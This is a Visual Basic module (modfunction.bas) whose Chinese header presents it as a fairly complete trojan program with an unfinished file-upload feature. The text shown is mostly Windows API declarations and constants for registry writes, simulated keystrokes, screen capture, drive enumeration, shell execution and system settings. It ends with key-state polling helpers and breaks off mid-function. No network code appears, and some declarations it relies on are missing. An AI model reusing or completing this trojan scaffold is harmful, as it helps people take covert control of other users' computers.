modfunction.bas

一个较为完整的VB木马程序。只是文件上传功能还不太完善。

Const REG_DWORD_LITTLE_ENDIAN = 4&
Const REG_DWORD_BIG_ENDIAN = 5&
Const REG_LINK = 6&
Const REG_MULTI_SZ = 7&
Const REG_RESOURCE_LIST = 8&
Const REG_FULL_RESOURCE_DESCRIPTOR = 9&
Const REG_RESOURCE_REQUIREMENTS_LIST = 10&

Const KEY_QUERY_VALUE = &H1&
Const KEY_SET_VALUE = &H2&
Const KEY_CREATE_SUB_KEY = &H4&
Const KEY_ENUMERATE_SUB_KEYS = &H8&
Const KEY_NOTIFY = &H10&
Const KEY_CREATE_LINK = &H20&
Const READ_CONTROL = &H20000
Const WRITE_DAC = &H40000
Const WRITE_OWNER = &H80000
Const SYNCHRONIZE = &H100000
Const STANDARD_RIGHTS_REQUIRED = &HF0000
Const STANDARD_RIGHTS_READ = READ_CONTROL
Const STANDARD_RIGHTS_WRITE = READ_CONTROL
Const STANDARD_RIGHTS_EXECUTE = READ_CONTROL
Const KEY_READ = STANDARD_RIGHTS_READ Or KEY_QUERY_VALUE Or KEY_ENUMERATE_SUB_KEYS Or KEY_NOTIFY
Const KEY_WRITE = STANDARD_RIGHTS_WRITE Or KEY_SET_VALUE Or KEY_CREATE_SUB_KEY
Const KEY_EXECUTE = KEY_READ

Dim hKey As Long, MainKeyHandle As Long
Dim rtn As Long, lBuffer As Long, sBuffer As String
Dim lBufferSize As Long
Dim lDataSize As Long
Dim ByteArray() As Byte

Const DisplayErrorMsg = False

'可选用：Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal lpszDir As String, ByVal FsShowCmd As Long) As Long
Public Declare Function GetDesktopWindow Lib "user32" () As Long
'可选用：Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Public Declare Function RegSetValue Lib "advapi32.dll" Alias "RegSetValueA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
'可选用：Const SW_SHOWNORMAL = 1
Const SE_ERR_FNF = 2&
Const SE_ERR_PNF = 3&
Const SE_ERR_ACCESSDENIED = 5&
Const SE_ERR_OOM = 8&
Const SE_ERR_DLLNOTFOUND = 32&
Const SE_ERR_SHARE = 26&
Const SE_ERR_ASSOCINCOMPLETE = 27&
Const SE_ERR_DDETIMEOUT = 28&
Const SE_ERR_DDEFAIL = 29&
Const SE_ERR_DDEBUSY = 30&
Const SE_ERR_NOASSOC = 31&
Const ERROR_BAD_FORMAT = 11&

Public Declare Function sndPlaySound Lib "winmm" Alias "sndPlaySoundA" (ByVal lpszSoundName As String, ByVal uFlags As Long) As Long
Public Declare Function sndStopSound Lib "winmm.dll" Alias "sndPlaySoundA" (ByVal lpszNull As Long, ByVal flags As Integer) As Integer

'可选用：Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
'可选用：Public Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
'可选用：Public Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long

Dim sString As String
Dim lLength As Long

Public Declare Function WritePrivateProfileString Lib "kernel32" Alias "WritePrivateProfileStringA" (ByVal lpApplicationName As String, ByVal lpKeyName As Any, ByVal lpString As Any, ByVal lpFileName As String) As Long
Public Declare Function GetPrivateProfileString Lib "kernel32" Alias "GetPrivateProfileStringA" (ByVal lpApplicationName As String, ByVal lpKeyName As Any, ByVal lpDefault As String, ByVal lpReturnedString As String, ByVal nSize As Long, ByVal lpFileName As String) As Long

Public Type OSVERSIONINFO
  dwOSVersionInfoSize As Long
  dwMajorVersion As Long
  dwMinorVersion As Long
  dwBuildNumber As Long
  dwPlatformId As Long
  szCSDVersion As String * 128
End Type

Public Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (lpVersionInformation As OSVERSIONINFO) As Long

Public Declare Sub keybd_event Lib "user32" (ByVal bVk As Byte, ByVal bScan As Byte, ByVal dwFlags As Long, ByVal dwExtraInfo As Long)
'可选用：Public Declare Function GetKeyboardState Lib "user32" (pbKeyState As Byte) As Long
'可选用：Public Declare Function SetKeyboardState Lib "user32" (lppbKeyState As Byte) As Long

Public Const VK_NUMLOCK = &H90
Public Const VK_SCROLL = &H91
Public Const VK_CAPITAL = &H14
Public Const KEYEVENTF_EXTENDEDKEY = &H1
Public Const KEYEVENTF_KEYUP = &H2
Public Const VER_PLATFORM_WIN32_NT = 2
Public Const VER_PLATFORM_WIN32_WINDOWS = 1

Public Type SYSTEM_INFO
    dwOemID As Long
    dwPageSize As Long
    lpMinimumApplicationAddress As Long
    lpMaximumApplicationAddress As Long
    dwActiveProcessorMask As Long
    dwNumberOfProcessors As Long
    dwProcessorType As Long
    dwAllocationGranularity As Long
    wProcessorLevel As Integer
    wProcessorRevision As Integer
End Type
'可选用：Type POINTAPI
'可选用：    X As Integer
'可选用：    Y As Integer
'可选用：End Type
Type KeyboardBytes
     kbByte(0 To 255) As Byte
End Type
Type SHELLEXECUTEINFO
    cbSize As Long
    fMask As Long
    hWnd As Long
    lpVerb As String
    lpFile As String
    lpParameters As String
    lpDirectory As String
    nShow As Long
    hInstApp As Long
    lpIDList As Long
    lpClass As String
    hkeyClass As Long
    dwHotKey As Long
    hIcon As Long
    hProcess As Long
End Type
Declare Function ReleaseCapture Lib "user32" () As Long
Declare Function BitBlt Lib "gdi32" (ByVal hDestDC As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, ByVal ySrc As Long, ByVal dwRop As Long) As Long
Declare Function StretchBlt Lib "gdi32" (ByVal hDC As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, ByVal ySrc As Long, ByVal nSrcWidth As Long, ByVal nSrcHeight As Long, ByVal dwRop As Long) As Long
Declare Function GetVolumeInformation Lib "kernel32" Alias "GetVolumeInformationA" (ByVal lpRootPathName As String, ByVal lpVolumeNameBuffer As String, ByVal nVolumeNameSize As Long, lpVolumeSerialNumber As Long, lpMaximumComponentLength As Long, lpFileSystemFlags As Long, ByVal lpFileSystemNameBuffer As String, ByVal nFileSystemNameSize As Long) As Long
Declare Function GetLogicalDrives& Lib "kernel32" ()
Declare Function GetDriveType& Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String)
Declare Function GetDiskFreeSpace& Lib "kernel32" Alias "GetDiskFreeSpaceA" (ByVal lpRootPathName As String, lpSectorsPerCluster As Long, lpBytesPerSector As Long, lpNumberOfFreeClusters As Long, lpTotalNumberOfClusters As Long)
Declare Function auxGetNumDevs% Lib "winmm" ()
'可选用：Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Declare Function ShowCursor Lib "user32" (ByVal bShow As Long) As Long
Declare Function GetTickCount& Lib "kernel32" ()
'可选用：Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal Y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
'可选用：Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
'可选用：Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
'可选用：Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Long
'可选用：Declare Function GetKeyboardState Lib "user32" (kbArray As KeyboardBytes) As Long
'可选用：Declare Function SetKeyboardState Lib "user32" (kbArray As KeyboardBytes) As Long
Declare Function tapiRequestMakeCall Lib "TAPI32.DLL" (ByVal dest As String, ByVal AppName As String, ByVal CalledParty As String, ByVal Comment As String) As Long
Declare Function ShellExecuteEX Lib "Shell32.DLL" Alias "ShellExecuteEx" (SEI As SHELLEXECUTEINFO) As Long
Declare Function SetCursorPos& Lib "User32.DLL" (ByVal X As Long, ByVal Y As Long)
Declare Function GetCursorPos& Lib "User32.DLL" (lpPoint As POINTAPI)
Declare Sub SHAddToRecentDocs Lib "Shell32.DLL" (ByVal uFlags As Long, ByVal pv As String)
Declare Sub GetSystemInfo Lib "kernel32" (lpSystemInfo As SYSTEM_INFO)
Declare Function SetCaretBlinkTime Lib "user32" (ByVal wMSeconds As Long) As Long
Declare Function GetCaretBlinkTime Lib "user32" () As Long
Declare Function SetDoubleClickTime Lib "user32" (ByVal wCount As Long) As Long
Declare Function GetDoubleClickTime Lib "user32" () As Long
Declare Function GetKeyboardType Lib "user32" (ByVal nTypeFlag As Long) As Long
'可选用：Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, lpvParam As Any, ByVal fuWinIni As Long) As Long
Private Declare Function StartDocPrinter Lib "winspool.drv" Alias "StartDocPrinterA" (ByVal hPrinter As Long, ByVal Level As Long, pDocInfo As DOCINFO) As Long
Private Declare Function EndDocPrinter Lib "winspool.drv" (ByVal hPrinter As Long) As Long
Private Declare Function EndPagePrinter Lib "winspool.drv" (ByVal hPrinter As Long) As Long
Private Declare Function StartPagePrinter Lib "winspool.drv" (ByVal hPrinter As Long) As Long
Private Declare Function WritePrinter Lib "winspool.drv" (ByVal hPrinter As Long, pBuf As Any, ByVal cdBuf As Long, pcWritten As Long) As Long
Private Declare Function OpenPrinter Lib "winspool.drv" Alias "OpenPrinterA" (ByVal pPrinterName As String, phPrinter As Long, pDefault As Any) As Long
Private Declare Function ClosePrinter Lib "winspool.drv" (ByVal hPrinter As Long) As Long
Global vararyDriveInfo(26, 11)
Global System As SYSTEM_INFO
Global Const SRCCOPY = &HCC0020
Global Const SRCAND = &H8800C6
Global Const MERGEPAINT = &HBB0226
'可选用：Public Const HWND_TOP = 0
'可选用：Public Const HWND_TOPMOST = -1
'可选用：Public Const HWND_NOTOPMOST = -2
'可选用：Public Const SWP_NOMOVE = &H2
'可选用：Public Const SWP_NOSIZE = &H1
'可选用：Public Const FLAGS = SWP_NOMOVE Or SWP_NOSIZE
'可选用：Public Const EWX_LOGOFF = 0
'可选用：Public Const EWX_SHUTDOWN = 1
'可选用：Public Const EWX_REBOOT = 2
'可选用：Public Const EWX_FORCE = 4
'可选用：Public Const VK_CAPITAL = &H14
'可选用：Public Const VK_NUMLOCK = &H90
'可选用：Public Const VK_SCROLL = &H91
Public Const SPI_GETACCESSTIMEOUT& = 60
Public Const SPI_GETANIMATION& = 72
Public Const SPI_GETBEEP& = 1
Public Const SPI_GETBORDER& = 5
Public Const SPI_GETDEFAULTINPUTLANG& = 89
Public Const SPI_GETDRAGFULLWINDOWS& = 38
Public Const SPI_GETFASTTASKSWITCH& = 35
Public Const SPI_GETFILTERKEYS& = 50
Public Const SPI_GETFONTSMOOTHING& = 74
Public Const SPI_GETGRIDGRANULARITY& = 18
Public Const SPI_GETHIGHCONTRAST& = 66
Public Const SPI_GETICONMETRICS& = 45
Public Const SPI_GETICONTITLELOGFONT& = 31
Public Const SPI_GETICONTITLEWRAP& = 25
Public Const SPI_GETKEYBOARDDELAY& = 22
Public Const SPI_GETKEYBOARDPREF& = 68
Public Const SPI_GETKEYBOARDSPEED& = 10
Public Const SPI_GETLOWPOWERACTIVE& = 83
Public Const SPI_GETLOWPOWERTIMEOUT& = 79
Public Const SPI_GETMENUDROPALIGNMENT& = 27
Public Const SPI_GETMOUSE& = 3
Public Const SPI_GETMINIMIZEDMETRICS& = 43
Public Const SPI_GETMOUSEKEYS& = 54
Public Const SPI_GETMOUSETRAILS& = 94
Public Const SPI_GETNONCLIENTMETRICS& = 41
Public Const SPI_GETPOWEROFFACTIVE& = 84
Public Const SPI_GETPOWEROFFTIMEOUT& = 80
Public Const SPI_GETSCREENREADER& = 70
Public Const SPI_GETSCREENSAVEACTIVE& = 16
Public Const SPI_GETSCREENSAVETIMEOUT& = 14
Public Const SPI_GETSERIALKEYS& = 62
Public Const SPI_GETSHOWSOUNDS& = 56
Public Const SPI_GETSOUNDSENTRY& = 64
Public Const SPI_GETSTICKYKEYS& = 58
Public Const SPI_GETTOGGLEKEYS& = 52
Public Const SPI_GETWINDOWSEXTENSION& = 92
Public Const SPI_GETWORKAREA& = 48
Public Const SPI_ICONHORIZONTALSPACING& = 13
Public Const SPI_ICONVERTICALSPACING& = 24
Public Const SPI_LANGDRIVER& = 12
'可选用：Public Const SPI_SCREENSAVERRUNNING& = 97
Public Const SPI_SETACCESSTIMEOUT& = 61
Public Const SPI_SETANIMATION& = 73
Public Const SPI_SETBEEP& = 2
Public Const SPI_SETBORDER& = 6
Public Const SPI_SETCURSORS& = 87
Public Const SPI_SETDEFAULTINPUTLANG& = 90
Public Const SPI_SETDESKPATTERN& = 21
Public Const SPI_SETDESKWALLPAPER& = 20
Public Const SPI_SETDOUBLECLICKTIME& = 32
Public Const SPI_SETDOUBLECLKHEIGHT& = 30
Public Const SPI_SETDOUBLECLKWIDTH& = 29
Public Const SPI_SETDRAGFULLWINDOWS& = 37
Public Const SPI_SETDRAGHEIGHT& = 77
Public Const SPI_SETDRAGWIDTH& = 76
Public Const SPI_SETFASTTASKSWITCH& = 36
Public Const SPI_SETFILTERKEYS& = 51
Public Const SPI_SETFONTSMOOTHING& = 75
Public Const SPI_SETGRIDGRANULARITY& = 19
Public Const SPI_SETHANDHELD& = 78
Public Const SPI_SETHIGHCONTRAST& = 67
Public Const SPI_SETICONMETRICS& = 46
Public Const SPI_SETICONS& = 88
Public Const SPI_SETICONTITLELOGFONT& = 34
Public Const SPI_SETICONTITLEWRAP& = 26
Public Const SPI_SETKEYBOARDDELAY& = 23
Public Const SPI_SETKEYBOARDPREF& = 69
Public Const SPI_SETKEYBOARDSPEED& = 11
Public Const SPI_SETLANGTOGGLE& = 91
Public Const SPI_SETLOWPOWERACTIVE& = 85
Public Const SPI_SETLOWPOWERTIMEOUT& = 81
Public Const SPI_SETMENUDROPALIGNMENT& = 28
Public Const SPI_SETMINIMIZEDMETRICS& = 44
Public Const SPI_SETMOUSE& = 4
Public Const SPI_SETMOUSEBUTTONSWAP& = 33
Public Const SPI_SETMOUSEKEYS& = 55
'可选用：Public Const SPI_SETMOUSETRAILS& = 93
Public Const SPI_SETNONCLIENTMETRICS& = 42
Public Const SPI_SETPENWINDOWS& = 49
Public Const SPI_SETPOWEROFFACTIVE& = 86
Public Const SPI_SETPOWEROFFTIMEOUT& = 82
Public Const SPI_SETSCREENREADER& = 71
Public Const SPI_SETSCREENSAVEACTIVE& = 17
Public Const SPI_SETSCREENSAVETIMEOUT& = 15
Public Const SPI_SETSERIALKEYS& = 63
Public Const SPI_SETSHOWSOUNDS& = 57
Public Const SPI_SETSOUNDSENTRY& = 65
Public Const SPI_SETSTICKYKEYS& = 59
Public Const SPI_SETTOGGLEKEYS& = 53
Public Const SPI_SETWORKAREA& = 47
'可选用：Public Const SPIF_UPDATEINIFILE = 1
'可选用：Public Const SPIF_SENDWININICHANGE = 2
Public Const SEE_MASK_INVOKEIDLIST = &HC
Public Const SEE_MASK_NOCLOSEPROCESS = &H40
Public Const SEE_MASK_FLAG_NO_UI = &H400

'可选用：Const WM_SYSCOMMAND = &H112&
Const SC_SCREENSAVE = &HF140&
Const SWP_HIDEWINDOW = &H80
Const SWP_SHOWWINDOW = &H40
Global Const HTCAPTION = 2
Global Const WM_NCLBUTTONDOWN = &HA1
Global kbArray As KeyboardBytes
Public pt As POINTAPI

Private Type DOCINFO
    pDocName As String
    pOutputFile As String
    pDatatype As String
End Type

'可选用：Public Function GetCapsLock() As Boolean
'可选用：    GetCapsLock = CBool(GetKeyState(vbKeyCapital) And 1) 'Return or set the Capslock toggle.
'可选用：End Function

Public Function GetCtrl() As Boolean
    GetCtrl = CBool(GetAsyncKeyState(vbKeyControl))
End Function

Public Function GetShift() As Boolean
    GetShift = CBool(GetAsyncKeyState(vbKeyShift)) 'Return or set the Capslock toggle.
End Function

Function Ctrl(Control, Char1, Char2)
'This function is similar to below but it
'checks if control key is pressed
    If GetCtrl = True Then
        Control = 1
        Ctrl = Char1
    Else
        Control = 0
        Ctrl = Char2
    End If
End Function
Function Shf(Shift, Char1, Char2)
'这个功能像IIF一样，除了没有可改动的语句